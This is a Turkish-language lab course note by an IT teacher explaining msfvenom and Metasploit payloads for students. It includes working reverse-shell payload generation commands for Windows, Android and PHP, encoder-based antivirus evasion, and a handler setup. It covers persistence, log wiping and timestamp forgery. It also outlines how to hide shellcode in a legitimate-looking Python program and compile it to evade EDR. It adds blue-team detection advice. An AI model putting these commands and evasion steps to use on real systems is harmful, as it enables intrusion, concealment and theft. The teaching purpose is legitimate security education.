msfvenom – Payload Oluşturucu

-

Hazırlayan: Nuri Tıraş – Bilişim Teknolojileri Öğretmeni

Bu ders notu, siber saldırıların nasıl kurgulandığını (Kırmızı Takım) ve bu saldırılara karşı kurumsal ağların nasıl savunulacağını (Mavi Takım) anlamak amacıyla hazırlanmıştır. Uygulamalar sadece yalıtılmış laboratuvar ortamında gerçekleştirilmelidir.

Yasal Uyarı: Bu eğitim, laboratuvar ve yetkili sızma testleri amacıyla hazırlanmıştır. İzinsiz sistemlerde kullanılmamalıdır. 

msfvenom Nedir?

msfvenom, Metasploit Framework içerisinde bulunan ve farklı platformlar için payload oluşturmayı sağlayan bir araçtır. Eski Metasploit sürümlerinde bulunan msfpayload ve msfencode araçlarının birleştirilmesiyle ortaya çıkmıştır. Payload üretme ve encode işlemlerini tek komutta gerçekleştirebilir. 

Basit bir ifadeyle:

  • Exploit → Açığı tetikler.

  • Payload → Açık başarılı olursa çalışacak kodu içerir.

  • msfvenom → Bu payload'ları üretir.

Metasploit Ekosisteminde msfvenom'un Yeri

Bir saldırı simülasyonu genellikle şu aşamalardan oluşur:

Keşif (Reconnaissance)
Zafiyet Tespiti
Exploit
Payload
Erişim

Burada msfvenom'un görevi payload üretmektir.

Örnek:

Exploit → MS17-010
Payload → windows/meterpreter/reverse_tcp
Araç → msfvenom

Payload Nedir?

Payload, exploit başarılı olduktan sonra hedef sistem üzerinde çalışan koddur.

En yaygın payload türleri:

Tür        Açıklama
Reverse Shell        Hedef sistem test ortamındaki dinleyiciye bağlantı kurar
Bind Shell        Hedef sistem belirli bir port açar
Meterpreter        Gelişmiş oturum yönetimi sağlar
Web Payload        Web uygulamaları için hazırlanır
Shellcode        Bellekte çalışacak ham makine kodu

Reverse Shell ve Bind Shell

Reverse Shell

Bağlantıyı hedef başlatır.

Hedef Sistem
Dinleyici

Avantajları:

  • NAT arkasında daha başarılıdır

  • Güvenlik duvarlarından geçme ihtimali daha yüksektir

  • En yaygın kullanılan yöntemdir

Bind Shell

Hedef belirli bir port açar.

Dinleyici
Hedef Sistem

Avantajları:

  • Basit yapı

  • Laboratuvar ortamlarında kolay kullanım

Dezavantajları:

  • Güvenlik duvarları tarafından engellenebilir.

Metasploit payload listesinde o kadar çok reverse_tcp ve bind_tcp gördükten sonra, laboratuvardaki 11. sınıf öğrencilerinizin bu ikisinin farkını ağ (network) mimarisi üzerinden tam olarak kavraması, siber güvenlik eğitiminin en can alıcı noktalarından biridir.

Öğrenciler genellikle "Madem ikisi de hedefe sızmamı sağlıyor, neden 1000 tane payload'un %90'ı Reverse (Ters) bağlantı?" diye sorarlar. Cevap, modern güvenlik duvarları (Firewalls) ve NAT (Ağ Adresi Çevirisi) cihazlarının çalışma mantığında gizlidir.

1. Bind Shell (Düz Bağlantı): Saldırgan Kapıyı Çalar

Bind Shell senaryosunda, siz zararlı yükü (payload) hedefe gönderdiğinizde şu adımlar gerçekleşir:

  • Mekanizma: Payload hedef bilgisayarda çalışır ve hedef makinenin üzerinde gizli bir kapı (port) açarak beklemeye başlar.

  • Bağlantı Yönü: Siz (Saldırgan), kendi makinenizden hedefin IP adresine ve açtığı o gizli porta doğru bağlantı isteği gönderirsiniz.

  • Neden Artık Çalışmıyor? Hedef bilgisayarın önünde bir Güvenlik Duvarı veya Modem (NAT) varsa, dışarıdan içeriye doğru (Inbound) gelen ve kimliği belirsiz olan bu bağlantı isteğini anında engeller. Bu yüzden Bind Shell, sadece hedefle aynı yerel ağdaysanız (veya hedefin firewall'u tamamen kapalıysa) işe yarar.

2. Reverse Shell (Ters Bağlantı): Kurban Sizin Kapınızı Çalar

Reverse Shell senaryosu, güvenlik duvarlarını atlatmak (Bypass) için geliştirilmiş çok daha zeki bir yöntemdir:

  • Mekanizma: Bu kez kapıyı hedefte değil, kendi makinenizde (LHOST ve LPORT ile) açıp dinlemeye başlarsınız. Payload hedef makinede çalıştığında, hiçbir kapı açmaz.

  • Bağlantı Yönü: Payload, hedef makinenin içerisinden çıkıp, dışarıdaki sizin makinenize (Saldırgan) doğru bir bağlantı başlatır. Kısacası kurban kendi rızasıyla size bağlanır.

  • Neden Çok Etkilidir? Sistem yöneticileri ve Güvenlik Duvarları, dışarıdan gelen trafiğe çok sertken, içeriden dışarıya giden (Outbound) trafiğe karşı çok esnektir. Çünkü çalışanlar internete (Örneğin 80 veya 443 portlarına) çıkmak zorundadır. Hedef bilgisayar içeriden dışarıya sizin makinenize bağlanmaya çalıştığında, güvenlik duvarı bunu "kullanıcı internette sörf yapıyor" sanarak çoğu zaman bağlantıya izin verir.

Öğrencileriniz hedefe sızmayı başardı, Meterpreter oturumunu açtı ve "Reverse Shell" mantığıyla güvenlik duvarını atlattı. Ancak sevinmek için henüz çok erken.

Laboratuvardaki o makine (örneğin kurbanın Windows bilgisayarı) yeniden başlatıldığında veya kurban bilgisayarı kapattığında, RAM (bellek) üzerinde çalışan o güzelim Meterpreter oturumu anında silinecek ve bağlantı kopacaktır. Ayrıca, içeri girerken sistemde çok fazla gürültü yaptılar ve olay günlüklerine (Event Logs) tonla iz bıraktılar.

Profesyonel bir sızma testinin (veya Kırmızı Takım operasyonunun) son iki adımı olan Kalıcılık (Persistence) ve İzleri Yok Etme (Anti-Forensics) aşamalarına geçelim.

1. Kalıcılık (Persistence): Arka Kapıyı Açık Bırakmak

Hedef makine yeniden başlatılsa bile, sistem açıldığında zararlı yükün (payload) otomatik olarak tekrar çalışmasını ve sizin makinenize (Pardus) geri bağlanmasını sağlama işlemidir.

Meterpreter ile Kalıcılık Nasıl Sağlanır?

Meterpreter içerisinde bu işi otomatize eden çok güçlü betikler (scripts) bulunur. En bilinen yöntem, zararlı kodu Windows'un başlangıç (Startup) kayıt defterine (Registry) eklemektir.

Öğrencileriniz aktif bir Meterpreter oturumundayken şu komutu çalıştırabilirler:

run persistence -X -i 10 -p 4444 -r 10.113.152.236

Bu parametreler ne anlama gelir?

  • -X: Zararlı yükü, makineyi açan herhangi bir kullanıcı için (sadece mevcut kullanıcı değil) başlangıca ekler.

  • -i 10: Hedef makine her 10 saniyede bir sizin LHOST adresinize (Pardus makinenize) bağlanmayı dener.

  • -p ve -r: Sizin dinlediğiniz port (LPORT) ve IP adresinizdir (LHOST).

Bu komut çalıştıktan sonra Meterpreter, .vbs (VBScript) formatında bir dosyayı hedefin gizli bir klasörüne (genellikle AppData veya Temp) yazar ve bunu Kayıt Defterindeki HKLM\Software\Microsoft\Windows\CurrentVersion\Run anahtarına yerleştirir. Artık bilgisayar her açıldığında, o dosya çalışacak ve size sessizce bir oturum gönderecektir.

2. İzleri Yok Etme (Anti-Forensics): Hayalet Modu

  1. sınıf öğrencileriniz sızma işlemini tamamlayıp arka kapılarını bıraktıktan sonra, sistem yöneticisinin (Mavi Takımın) Görev Yöneticisine veya Olay Görüntüleyicisine (Event Viewer) baktığında hiçbir şey anlamamasını sağlamalıdır.

A. Logları (Günlükleri) Silmek: clearev

Windows, başarılı/başarısız giriş denemelerini, oluşturulan yeni servisleri ve hataları sürekli kaydeder. Meterpreter'de bu logları tek hamlede silmek için ikonik bir komut vardır:

meterpreter > clearev

Bu komut; Application (Uygulama), System (Sistem) ve Security (Güvenlik) günlüklerinin tamamını temizler. Ekranda "Wiping records..." (Kayıtlar siliniyor) yazısını gördüğünüzde sistem kör edilmiş demektir.

B. Dosya Zaman Damgalarını Değiştirmek: timestomp

Sisteme dışarıdan bir dosya yüklediğinizde (örneğin özel bir .exe veya script), Mavi Takım dosyanın "Oluşturulma Tarihi"ne bakarak bunun bugün sisteme atıldığını kolayca anlar. timestomp komutu, yüklediğiniz zararlı dosyanın oluşturulma ve değiştirilme tarihlerini, sistemin meşru bir dosyasıyla (örneğin cmd.exe) aynı olacak şekilde klonlar.

meterpreter > timestomp c:\gizli_virus.exe -f c:\windows\system32\cmd.exe

Artık sizin virüsünüz de sanki 2009 yılında Microsoft tarafından oluşturulmuş meşru bir sistem dosyası gibi görünecektir.

Mavi Takım Perspektifi (Savunma Stratejisi)

Öğrencilere bu "Kötü Adam" tekniklerini gösterdikten sonra, laboratuvarın diğer tarafına geçip "İyi Adam" şapkasını takmalarını istemek eğitimi zirveye taşıyacaktır. Bu taktikler nasıl yakalanır?

  1. Persistence (Kalıcılık) Tespiti: Sistem yöneticileri başlangıçta çalışan gizli programları bulmak için Microsoft'un efsanevi Sysinternals Autoruns aracını kullanırlar. Bu araç, Kayıt Defterine veya Zamanlanmış Görevlere (Scheduled Tasks) gizlenmiş o .vbs dosyasını anında kırmızıyla işaretler.

  2. clearev Komutunun Ölümcül Hatası: Öğrenciler logları sildiklerinde tamamen görünmez olduklarını sanırlar. Oysa Windows, loglar silindiği anda Event ID 1102 (The audit log was cleared - Denetim günlüğü temizlendi) adında silinemez, yepyeni bir kırmızı alarm günlüğü oluşturur. Mavi takım bu ID'yi gördüğü an "İçeride biri var ve izlerini siliyor!" diyerek fişi çeker.

  3. Merkezi Loglama (SIEM): Modern ağlarda loglar sadece o bilgisayarda tutulmaz; saniyeler içinde merkezi bir SIEM sunucusuna kopyalanır. Öğrenci hedefteki logları silse bile, SIEM sunucusundaki kopyalar çoktan güvene alınmıştır.

Bu aşamalarla birlikte, bir hedefin keşfedilmesinden sömürülmesine, hak yükseltilmesinden kalıcılık sağlanmasına kadar tam bir "Cyber Kill Chain" (Siber Saldırı Zinciri) senaryosunu tamamlamış oldunuz! 

Staged ve Stageless Payload

Staged Payload

İki aşamada yüklenir.

Örnek:

windows/meterpreter/reverse_tcp

Önce küçük bir stager gönderilir, ardından Meterpreter yüklenir.

Stageless Payload

Tek parça halinde gönderilir.

Örnek:

windows/meterpreter_reverse_tcp

Avantajları:

  • Daha hızlı çalışır.

  • Ağ trafiği daha az dikkat çeker.

Dezavantajları:

  • Dosya boyutu daha büyüktür.

Staged (Aşamalı) ve Stageless (Tek Parça) Payload kavramları, özellikle eğitim laboratuvarlarında ve yetkili sızma testlerinde kullanılan payload mimarisini anlamak için önemlidir.

1. Staged Payload Nedir?

Staged payload iki aşamadan oluşur:

Aşama 1 (Stage 0)

Hedef sisteme çok küçük bir kod gönderilir.

Örnek:

windows/meterpreter/reverse_tcp

Bu küçük kod çalışınca saldırgan sistemle bağlantı kurar.

Aşama 2 (Stage 1)

Bağlantı kurulduktan sonra asıl büyük payload ağ üzerinden indirilir.

Örneğin:

  • Meterpreter DLL

  • Komut yürütme modülleri

  • Dosya yönetimi fonksiyonları

Sonradan belleğe yüklenir.

Çalışma Mantığı

Hedef
  │
  │ Stage 0 çalışır
  ▼
Saldırgana bağlanır
  │
  ▼
Stage 1 indirilir
  │
  ▼
Meterpreter açılır

2. Stageless Payload Nedir?

Stageless payload tek dosyadır.

Örnek:

windows/meterpreter_reverse_tcp

Dikkat:

windows/meterpreter/reverse_tcp      → Staged

windows/meterpreter_reverse_tcp      → Stageless

Aradaki "/" ve "_" farkı çok önemlidir.

Çalışma Mantığı

Tüm Meterpreter kodu dosyanın içindedir.

Hedef
  │
  ▼
Payload çalışır
  │
  ▼
Doğrudan Meterpreter açılır

Ek indirme gerekmez.

Staged Payload Avantajları

Daha Küçük Boyut

Örnek:

Stage 0 = 10-20 KB

Tam Meterpreter = 700 KB+

İlk dosya daha küçüktür.

Ağ Trafiği Az

İlk aşamada çok az veri gönderilir.

Belleğe Dinamik Yükleme

İkinci aşama sadece gerektiğinde yüklenir.

Eski Sistemlerde Avantaj

Eski exploitlerde:

Buffer Overflow

alanı çok küçük olabilir.

Örneğin:

500 byte

yer varsa tam Meterpreter sığmaz.

Bu durumda staged kullanılır.

Staged Payload Dezavantajları

İki Ayrı Ağ Bağlantısı

Önce Stage 0:

Reverse TCP

Sonra:

Meterpreter Stage

indirilir.

Bu süreç IDS/IPS tarafından görülebilir.

EDR Tespiti Daha Kolay

Birçok modern güvenlik ürünü:

  • Microsoft Defender

  • CrowdStrike

  • SentinelOne

  • Sophos

ikinci aşama indirmelerini şüpheli davranış olarak algılar.

Ağ Kesilirse Başarısız

Stage 0 başarılı

ama

Stage 1 indirilemedi

ise oturum açılamaz.

Stageless Payload Avantajları

Tek Bağlantı

Ek aşama yoktur.

Payload
↓
Meterpreter

Daha Güvenilir

Ağ problemi olsa bile:

Payload dosyası

içindeki her şey hazırdır.

Modern EDR Karşısında Daha Kararlı

İkinci aşama indirme olmadığı için:

Download Cradle
Stage Download
Reflective Loading

olayları oluşmaz.

Bu nedenle birçok durumda daha stabil çalışır.

Bulut ve NAT Ortamlarında Daha İyi

Özellikle:

  • AWS

  • Azure

  • Docker

  • Kubernetes

ortamlarında genellikle stageless tercih edilir.

Stageless Payload Dezavantajları

Daha Büyük Dosya

Örneğin:

Staged      : 15 KB

Stageless   : 800 KB

İmza Tabanlı Tespit

Dosyanın içinde tüm Meterpreter bulunduğundan:

  • Antivirus

  • YARA kuralları

daha kolay eşleşebilir.

Karşılaştırma Tablosu

ÖzellikStagedStageless
Boyut    Küçük    Büyük
Ağ Trafiği    Fazla aşamalı    Tek sefer
Kararlılık    Orta    Yüksek
NAT Ortamı    Daha sorunlu    Daha iyi
EDR Tespiti    Daha yüksek    Daha düşük olabilir
Eski Exploitler    Çok uygun    Uygun değil
Modern Testler    Orta    Çok uygun

Metasploit Örnekleri

Staged

windows/meterpreter/reverse_tcp

windows/meterpreter/reverse_https

linux/x64/meterpreter/reverse_tcp

Stageless

windows/meterpreter_reverse_tcp

windows/meterpreter_reverse_https

linux/x64/meterpreter_reverse_tcp

Günümüzde Hangisi Daha Çok Kullanılıyor?

Güncel kırmızı takım (Red Team) ve yetkili sızma testi çalışmalarında genellikle:

Stageless Payload

daha fazla tercih edilmektedir.

Bunun sebepleri:

  • Daha kararlı olması

  • Tek aşamalı çalışması

  • Ağ sorunlarından etkilenmemesi

  • Modern EDR ortamlarında daha öngörülebilir davranması

Ancak eski exploit geliştirme çalışmalarında ve küçük alanlı bellek taşması senaryolarında hâlâ:

Staged Payload

önemini korumaktadır.

Eğitim laboratuvarları için öneri

Öğrenme amacıyla ikisini de incelemek faydalıdır:

  1. Önce staged payload ile "aşama yükleme" mantığını öğrenin.

  2. Sonra stageless payload ile modern mimariyi inceleyin.

Gerçek dünyadaki güncel kurumsal ortamlarda ise, yetkili testler kapsamında çalışan ekipler çoğu zaman stageless mimariyi tercih etmektedir.


msfvenom Temel Komut Yapısı

Plaintext:
msfvenom --help
MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /usr/bin/msfvenom [options] <var=val>
Options:
    -p, --payload       <payload>    Kullanılacak zararlı yükü seçer (Örn: windows/meterpreter/reverse_tcp)
    -l, --list          [type]       Modül türlerini listeler (payloads, encoders, nops, platforms)
    -n, --nopsled       <length>     Payload'un başına belirtilen uzunlukta NOP (No Operation) ekler
    -f, --format        <format>     Çıktı formatını belirler (Örn: exe, elf, python, c, raw)
    -e, --encoder       <encoder>    Kullanılacak şifreleme/kodlama algoritmasını seçer (Örn: x86/shikata_ga_nai)
    -a, --arch          <arch>       Hedef mimariyi belirtir (Örn: x86, x64, mips)
        --platform      <platform>   Hedef işletim sistemini belirtir (Örn: windows, linux, android)
    -o, --out           <path>       Oluşturulan dosyanın nereye kaydedileceğini belirtir
    -b, --badchars      <list>       Oluşturulan kodda bulunmaması gereken "kötü karakterleri" belirler (Örn: '\x00\xff')
    -i, --iterations    <count>      Kodun kaç kez şifreleneceğini (encode edileceğini) belirtir
    -x, --template      <path>       Kendi payload'unuzu içine gizlemek için meşru bir dosya (şablon) kullanmanızı sağlar

En Sık Kullanılan Parametrelerin Anatomisi

Öğrencilerinizin Kırmızı Takım (Red Team) pratiklerinde "özel" bir zararlı yük oluştururken bu parametreleri nasıl bir araya getirdiklerini inceleyelim:

1. Payload Seçimi ve Hedef Belirleme (-p, --platform, -a)

Tıpkı Metasploit konsolunda olduğu gibi, hedefin ne olduğunu ve ona ne göndereceğinizi seçmeniz gerekir.

  • msfvenom -p windows/x64/meterpreter/reverse_tcp komutu, 64-bit bir Windows makine için geri bağlantı (reverse shell) açacak bir yük oluşturur.

2. Çıktı Formatı (-f)

Oluşturulan zararlı yükün hangi dilde veya dosya formatında olacağını belirler.

  • Hedef Windows ise -f exe

  • Hedef Linux ise -f elf

  • Eğer web tabanlı bir zafiyet sömürülüyorsa veya kod bir Python betiğinin içine gömülecekse -f python veya -f c kullanılır.

3. Güvenlik Sistemlerini Atlatma Çabaları (-e, -i, -x)

İşte siber güvenliğin en can alıcı noktalarından biri burasıdır. Standart bir payload oluşturulduğunda, en basit antivirüs bile bunu saniyeler içinde yakalar. Saldırganlar bu parametreleri şu amaçlarla kullanır:

  • -e x86/shikata_ga_nai: Payload'un imzasını değiştirmek (obfuscation) için Metasploit'in meşhur kodlayıcılarını kullanır.

  • -i 5: Bu kodlama işlemini örneğin 5 kez üst üste yaparak analizi zorlaştırmaya çalışır.

  • -x meşru_program.exe: Oluşturulan zararlı kodu, internetten indirilmiş masum görünen bir kurulum dosyasının veya oyunun içine enjekte eder (Trojanlaştırma).

Mavi Takım Perspektifi: Msfvenom Artık İşe Yarıyor mu?

Msfvenom'un kendi içindeki kodlayıcıları (encoders) artık modern antivirüsleri ve EDR'ları atlatmak için yeterli değildir.

Güvenlik şirketleri shikata_ga_nai gibi popüler kodlayıcıların nasıl çalıştığını yıllar önce çözdü ve artık sadece payload'un imzasını değil, programın bellekteki davranışını (Behavioral Analysis) inceliyorlar. Öğrenciler msfvenom ile ürettikleri bir .exe dosyasını laboratuvardaki güncel bir Windows 10/11 makinesine attıklarında, Windows Defender muhtemelen bunu anında "Malicious" (Zararlı) olarak etiketleyip silecektir.

msfvenom -p <payload> LHOST=<IP> LPORT=<PORT> -f <format> > output_file

Parametreler:

Parametre        Açıklama
-p        Payload seçimi
LHOST        Dinleyici IP adresi
LPORT        Dinleyici portu
-f        Çıktı formatı
-o        Dosya adı

Faydalı Komutlar

Payload Listeleme

msfvenom -l payloads

msfvenom --list payloads: Metasploit'in Cephaneliğini Keşfetmek

Terminalinize msfvenom --list payloads (veya kısaca -l payloads) yazdığınızda, Metasploit Framework'ün içinde barındırdığı tüm zararlı yüklerin (yaklaşık 1000'den fazla) devasa bir kataloğunu ekrana dökmüş olursunuz.

Öğrencileriniz laboratuvar ortamında kendilerine özgü bir saldırı senaryosu kurgulamak istediklerinde, kullanabilecekleri "mühimmatları" seçtikleri yer burasıdır.

Çıktı Bize Ne Gösterir?

Komutu çalıştırdığınızda liste genellikle üç sütun halinde akar:

  1. Name (İsim): Yükün hedeflediği platform, mimari ve bağlantı türü. (Örn: windows/x64/meterpreter/reverse_tcp)

  2. Description (Açıklama): Bu yükün ne işe yaradığına dair kısa bir bilgi.

Hatırlatma: Tam da bu listeye bakarken, bir önceki adımda konuştuğumuz Alt Tire (_) ve Eğik Çizgi (/) kuralı hayat kurtarır. Öğrenciler bu devasa listeye bakarken hangisinin "Aşamalı" (Staged), hangisinin "Tekil" (Single) olduğunu sadece isimlerine bakarak anında ayırt edebilirler.

Eğitim Laboratuvarı İçin Kritik Bir İpucu: Filtreleme (grep)

  1. sınıf öğrencileriniz Pardus (Linux) terminallerinde bu komutu ilk çalıştırdıklarında, ekrandan yüzlerce satır hızla akıp geçecek ve aradıklarını bulmaları imkansız hale gelecektir.

Onlara Linux'un gücünü (özellikle grep komutunu) Metasploit ile nasıl birleştireceklerini göstermek harika bir pratik olacaktır:

Örnek Senaryo: Öğrenci sadece "Windows" için yazılmış, "64-bit" olan ve içinde "meterpreter" geçen yükleri listelemek istiyor. Dev listeyi tek tek okumak yerine şu komut dizilimini kullanabilir:

msfvenom -l payloads | grep windows | grep x64 | grep meterpreter

Bu sayede 1000'den fazla sonuç bir anda 15-20 satırlık, nokta atışı bir listeye düşer.

Sıradaki Aşama: Reverse (Ters) vs Bind (Düz) Bağlantı

Bu listeyi incelerken öğrencilerin en çok dikkatini çekecek bir diğer isimlendirme kuralı, yüklerin sonundaki reverse_tcp ve bind_tcp ibareleri olacaktır.

Encoder Listeleme

msfvenom -l encoders

Format Listeleme

msfvenom -l formats

msfvenom --list formats: Zararlı Yükün Kılıfını Belirlemek

Terminalinize msfvenom --list formats (veya kısaca -l formats) yazdığınızda, oluşturduğunuz zararlı yükü (payload) hedef sisteme hangi "pakette" veya "dilde" teslim edeceğinizi seçtiğiniz devasa bir menü açılır.

Zararlı kodun kendisi (örneğin bir reverse_tcp bağlantısı) her zaman aynı kalsa da, bu kodun hedefe nasıl sızacağı tamamen seçilen çıktı formatına bağlıdır. Çıktı formatları siber güvenlik dünyasında iki ana kategoriye ayrılır:

1. Executable Formats (Çalıştırılabilir Formatlar)

Bu formatlar, hedef işletim sisteminin doğrudan çift tıklayarak veya terminalden koşturarak çalıştırabileceği, derlenmiş ve paketlenmiş dosyalardır.

  • exe / exe-only / exe-service: Windows işletim sistemlerinin standart çalıştırılabilir dosyalarıdır. Öğrenciler Windows hedefleri için en çok bunu denerler. exe-service seçeneği, zararlı yükün arka planda bir Windows Hizmeti (Service) olarak çalışmasını sağlayarak kalıcılığı artırır.

  • elf: Linux mimarilerinin (örneğin laboratuvardaki Pardus ETAP 23 makinelerinin) yerel çalıştırılabilir dosyalarıdır.

  • macho: Apple macOS sistemleri için kullanılan dosya formatıdır.

  • msi: Windows kurulum (Installer) paketleridir. Kurbanın sanki meşru bir yazılım kuruyormuş gibi zararlı yükü sistemine entegre etmesini sağlar.

  • vba / vbs: Oltalama (Phishing) saldırılarında e-posta ile gönderilen Word/Excel makrolarının içine gömülmek üzere hazırlanan formattır.

2. Transform Formats (Dönüştürme / Kod Formatları)

Kırmızı Takım (Saldırgan) uzmanlarının asıl hünerlerini sergilediği kategori burasıdır. Çıktı, doğrudan çalışan bir dosya olarak değil; başka bir programın içine gömülmek üzere ham kod (shellcode) olarak verilir.

  • raw / hex: Zararlı yükün işlemcinin anlayacağı en saf, ham makine kodudur.

  • c, csharp, java, ruby: Shellcode'u, bu programlama dillerindeki dizilere (array) veya değişkenlere yerleştirilmeye hazır halde verir.

  • python: Özellikle çapraz platform (cross-platform) masaüstü yazılımları geliştirilirken veya özel sömürü araçları yazılırken en çok tercih edilen formatlardan biridir. msfvenom çıktıyı doğrudan bir Python betiğinin içine yapıştırılacak bir bayt dizisi (\x4e\x55\x52\x49...) olarak üretir.

Gelişmiş Savunma Atlatma (AV Evasion) Senaryosu

Laboratuvar simülasyonlarında, antivirüsleri atlatmak için msfvenom ile doğrudan .exe üretmenin artık işe yaramadığını konuşmuştuk. İşin içine yazılım geliştirme yetenekleri girdiğinde süreç şu şekilde profesyonelleşir:
  • msfvenom -p windows/x64/meterpreter/reverse_tcp -f python komutu ile zararlı yükün ham shellcode'u elde edilir.
  • Bu kod, PyQt6 veya standart kütüphaneler kullanılarak yazılmış, meşru görünen (örneğin bir ağ performans ölçüm aracı veya hesap makinesi) özel bir Python betiğinin içine yerleştirilir.
  • Betik, bellekte (RAM) yeni bir alan açarak bu ham kodu doğrudan işletim sistemine enjekte edecek API çağrılarını (ctypes üzerinden) kullanır.
  • Son aşamada bu Python kodu; Nuitka, PyInstaller veya benzeri yerel ikili (native binary) derleme araçları kullanılarak izole edilmiş, kapalı kaynaklı ve ikon eklenmiş bağımsız bir .exe veya .elf dosyasına dönüştürülür.

Derleme aşamasında kodun yapısı tamamen değiştiği ve obfuscation (karmaşıklaştırma) uygulandığı için, ortaya çıkan bu yeni ve tamamen "özel üretim" dosyanın güvenlik duvarları veya EDR sistemleri tarafından statik imza analiziyle yakalanması neredeyse imkansız hale gelir.

Desteklenen Platformlar

msfvenom birçok platform için payload oluşturabilir. 

  • Windows

  • Linux

  • Android

  • macOS

  • Web Uygulamaları

  • Shellcode formatları

Çıktı Formatları

msfvenom farklı formatlarda çıktı verebilir. 

Format    Açıklama
exe    Windows
elf    Linux
apk    Android
php    PHP
asp    ASP.NET
jsp    Java
python    Python
ruby    Ruby
c    Shellcode

Meterpreter Nedir?

Meterpreter, Metasploit'in en gelişmiş payload ailesidir. 

Özellikleri:

  • Dosya yönetimi

  • Süreç yönetimi

  • Ağ bilgileri toplama

  • Yetki yükseltme modülleri

  • Eklenti desteği

Meterpreter bellek içerisinde çalıştığından geleneksel shell'lere göre daha gelişmiştir.

Encoder Nedir?

Encoder, payload verisini farklı biçimde kodlayarak bazı güvenlik çözümlerinin tespitini zorlaştırmaya çalışır. Ancak modern güvenlik ürünlerine karşı garanti sağlamaz.

En bilinen encoder:

x86/shikata_ga_nai

Özellikleri:

  • Polimorfik yapı

  • Her çalıştırmada farklı çıktı

  • Tarihsel olarak en popüler encoder

-e parametresi ile payload encode edilebilir. Örneğin:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -e x86/shikata_ga_nai -f exe > shell.exe

Format ve Dosya Türleri

  • .exe, .apk, .elf, .py, .php, .asp, .jsp
  • Shellcode formatında (c, python, ruby)

Metasploit ile Birlikte Kullanımı

msfvenom tarafından oluşturulan payload'lar Metasploit handler ile kullanılabilir. 

Genel süreç:

1. Payload oluştur
2. Handler başlat
3. Laboratuvar hedefinde test et
4. Oturumu doğrula

Kullanım Alanları

Penetrasyon Testleri

Yetkili güvenlik testlerinde payload davranışlarını incelemek için kullanılır. 

Red Team Operasyonları

Gerçek saldırı tekniklerinin güvenli şekilde simüle edilmesini sağlar. 

Eğitim Laboratuvarları

Öğrencilerin exploit–payload ilişkisini anlamaları için idealdir. 

Avantajları

✅ Çoklu platform desteği

✅ Çok sayıda payload türü

✅ Encoder desteği

✅ Metasploit entegrasyonu

✅ Esnek çıktı formatları

✅ Aktif geliştirme süreci

Sınırlamaları

❌ Modern güvenlik ürünleri birçok payload'ı tespit edebilir.

❌ Yanlış IP veya port ayarı payload'ın çalışmamasına neden olabilir.

❌ Yalnızca yetkili ortamlarda kullanılmalıdır.

msfvenom ve Veil-Evasion Karşılaştırması

Özellik        msfvenom        Veil-Evasion
Platform Desteği        Çoklu Platform        Daha çok Windows
Kullanım Kolaylığı        Yüksek        Orta
Topluluk Desteği        Çok Güçlü        Daha Az
Güncelleme Sıklığı        Aktif        Daha Az Aktif


Öğrenme Yol Haritası

Başlangıç

  • Payload kavramını öğren

  • Reverse Shell mantığını öğren

  • Metasploit Framework kur

Orta Seviye

  • Meterpreter oturumları

  • Handler yapılandırması

  • Payload türleri

İleri Seviye

  • Shellcode geliştirme

  • Özel payload analizi

  • AV/EDR tespit yöntemlerini inceleme

  • Red Team operasyonları


Temel Komut Yapısı

msfvenom -p <payload> LHOST=<saldırgan_ip> LPORT=<saldırgan_port> -f <format> > output_file

Windows İçin Payload Oluşturma

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe > win_shell.exe

Android APK Payload Örneği

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -o malicious.apk

PHP Payload

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f raw > shell.php

Encoder Kullanarak Antivirüs Atlama

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe > evaded.exe


Metasploit Konsolu ile Birlikte Kullanım

msfvenom ile payload oluşturduktan sonra, Metasploit konsolunda ilgili handler çalıştırılır:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4444
exploit

Sonuç

msfvenom, Metasploit Framework'ün en önemli bileşenlerinden biridir ve payload üretimi konusunda büyük esneklik sunar. Windows, Linux, Android ve web platformları için farklı payload türleri oluşturabilir; encoder ve format desteği sayesinde eğitim laboratuvarları, sızma testleri ve red team çalışmalarında yaygın olarak kullanılır. Ancak günümüzde modern güvenlik çözümlerinin gelişmesi nedeniyle payload oluşturma kadar, savunma sistemlerinin bu payload'ları nasıl tespit ettiğini anlamak da önemlidir. 


Metasploit mimarisinde zararlı yüklerin (payloads) nasıl çalıştığını, nasıl boyutlandırıldığını ve hedef sisteme nasıl iletildiğini belirleyen çok temel bir sınıflandırmadır. Metin, bu yapıyı dört ana klasör (kategori) ve ince bir isimlendirme kuralı üzerinden anlatıyor.

İşte bu kavramların siber güvenlikteki karşılıkları ve açıklamaları:

1. Adapters (Adaptörler)

Adaptörler, tekil (single) bir zararlı yükü alıp farklı bir formata veya çalışma mantığına dönüştürmek için onu sarmalar (paketler).

  • Ne işe yarar? Örneğin, elinizde ham bir zararlı kod var. Bir adaptör kullanarak bu kodu tek satırlık bir PowerShell veya Python komutu içine gömebilirsiniz. Böylece hedef sistemde doğrudan bu komut satırını çalıştırarak asıl yükü aktif hale getirebilirsiniz.

2. Singles (Tekiller / Bağımsız Yükler)

İngilizce metinde de belirtildiği gibi "Self-contained" yani kendi kendine yetebilen yüklerdir.

  • Nasıl çalışır? Çalışmak için internetten veya sizin makinenizden ekstra hiçbir şey indirmeye ihtiyaç duymazlar.

  • Ne yaparlar? Görevleri genellikle tek seferlik ve basittir: Hedef sisteme yeni bir yönetici kullanıcısı eklemek, bir programı (örneğin notepad.exe) başlatmak veya basit bir komut koşturmak gibi eylemleri tek başlarına gerçekleştirirler.

3. Stagers (Hazırlayıcılar / Kuryeler)

Aşamalı (Staged) saldırıların ilk adımıdır ve görevi sadece ilk bağlantı kanalını kurmaktır.

  • Neden kullanılır? Güvenlik duvarları veya kısıtlı bellek alanları, büyük boyutlu zararlı dosyaları anında yakalayabilir veya engelleyebilir. "Stager" adı verilen kod parçacığı çok küçüktür. Hedef sisteme ilk olarak bu küçük parça sızar, dikkati çekmeden sizinle bir iletişim kanalı açar ve ardından asıl büyük zararlı yükü (Stage) bu kanal üzerinden indirir. Bir nevi kapıyı içeriden açan kişidir.

4. Stages (Aşamalar / Asıl Yükler)

